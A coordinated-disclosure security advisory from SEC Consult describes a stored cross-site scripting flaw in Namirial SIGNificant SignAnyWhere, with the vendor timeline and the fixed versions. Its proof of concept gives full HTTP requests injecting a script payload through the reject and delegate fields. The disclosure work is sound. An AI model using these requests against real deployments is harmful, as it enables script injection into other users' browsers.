=======================================================================
title: Stored Cross-Site Scripting (XSS) Vulnerability
product: Namirial SIGNificant SignAnyWhere
vulnerable version: v6.10.60.25434 (SSP v4.22.60.25434)
v6.10.100.25817 (SSP v4.22.100.25817)
fixed version: v19.76.0.26030 (SSP v19.76.0.26030)
v20.14.0.26049 (SSP v20.14.0.26049)
CVE number: -
impact: high
homepage: https://www.namirial.com/en/
found: 2020-04-01
by: Philipp Espernberger (Office Linz)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Namirial is a Trust Service Provider, focused on addressing the
fast growing
market of Digital Transaction Management (DTM), which includes
legally compliant
electronic signatures, managing and tracking documents flows,
conducting secure
transactions and ensuring secure storage of data."
Source: https://www.namirial.com/en/trust-services/
Business recommendation:
------------------------
Update to the latest version of Namirial SIGNificant
SignAnyWhere.
An in-depth security analysis performed by security
professionals is highly
advised, as the software may be affected from further security
issues.
Vulnerability overview/description:
-----------------------------------
1. Stored Cross-Site Scripting (Authenticated access)
Due to the lack of input validation and output sanitization, an
attacker, who was
granted access to a document that is provided by a customer via
email, can inject
malicious JavaScript code, which will be executed in the browser of
a user.
Proof of concept:
-----------------
1. Stored Cross-Site Scripting (Authenticated access)
The following method can be used to exploit the stored cross-site
scripting
vulnerability.
Click the link, which was sent to you via email for signing the document.
There are 2 possibilities to inject a cross-site scripting
payload:
1: Reject the document.
2: Delegate the document.
The request below shows that an attacker can inject a malicious
payload
via the rejection functionality (the RejectMessage key is
affected).
POST /SawViewer/SignAnywhereServices.asmx/RejectWorkstep
HTTP/1.1
Host: $host
---snip---
{"basicParameters":{"WorkstepId":"<removed>",
"GeolocationLongitude":0,"GeolocationLatitude":0,
"GeolocationErrorState":"NOT_USED","Accuracy":-1,"UsedLanguage":"de","SupportId":"<removed>"},
"rejectConfiguration":"{\"RejectMessage\":\"<script>alert(location.origin)</script>\",\"Type\":\"Reject\"}"}
Using the same process an attacker can also inject a malicious
payload
via the delegation functionality (the delegationReason key is
affected).
POST /SawViewer/SignAnywhereServices.asmx/RejectWorkstep
HTTP/1.1
Host: $host
---snip---
{"basicParameters":{"WorkstepId":"<removed>",
"GeolocationLongitude":0,"GeolocationLatitude":0,
"GeolocationErrorState":"GEOLOC_NO_TIMEOUT","Accuracy":-1,"UsedLanguage":"de","SupportId":"<removed>"},
"rejectConfiguration":"{\"RejectMessage\":\"",\"Type\":\"Delegation\",\"AdditionalInformation\":\"
{\\\"firstName\\\":\\\"name\\\",\\\"lastName\\\":\\\"name\\\",\\\"email\\\":\\\"delegation
mail\\\",
\\\"phoneNumber\\\":\\\"phone
number\\\",\\\"delegationReason\\\":\\\"<script>alert(location.origin)</script>\\\"}\"}"}
The injected cross-site scripting payload is stored within the
application and
upon opening the document the payload will be automatically
executed.
Vulnerable / tested versions:
-----------------------------
The following versions of the software have been tested and found
to be vulnerable:
* Namirial SIGNificant SignAnyWhere version v6.10.60.25434 (SSP
v4.22.60.25434)
* Namirial SIGNificant SignAnyWhere version v6.10.100.25817 (SSP
v4.22.100.25817)
Previous and newer versions may also be affected.
Vendor contact timeline:
------------------------
2020-04-03: Contacting vendor through contact form
(https://www.namirial.com/de/kontaktformular/)
2020-04-08: Response from the vendor with the contact details.
2020-04-10: Contact person requests to obtain advisory via Support
Platform (Upload Report).
2020-04-10: Advisory uploaded to vendor.
2020-05-26: Vendor released updated versions (19.76 and 20.14 )
2020-06-18: Testing patched version (v19.76.0.26030)
2020-07-28: Coordinated release of security advisory
Solution:
---------
Upgrade Namirial SIGNificant SignAnyWhere to version v19.76.0.26030
(SSP v19.76.0.26030) or
Upgrade Namirial SIGNificant SignAnyWhere to version v20.14.0.26049
(SSP v20.14.0.26049)
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC
Consult. It
ensures the continued knowledge gain of SEC Consult in the field of
network
and application security to stay ahead of the attacker. The SEC
Consult
Vulnerability Lab supports high-quality penetration testing and the
evaluation
of new offensive and defensive technologies for our customers.
Hence our
customers obtain the most current information about vulnerabilities
and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application
https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of
SEC Consult?
Contact our local offices
https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF P. Espernberger / @2020
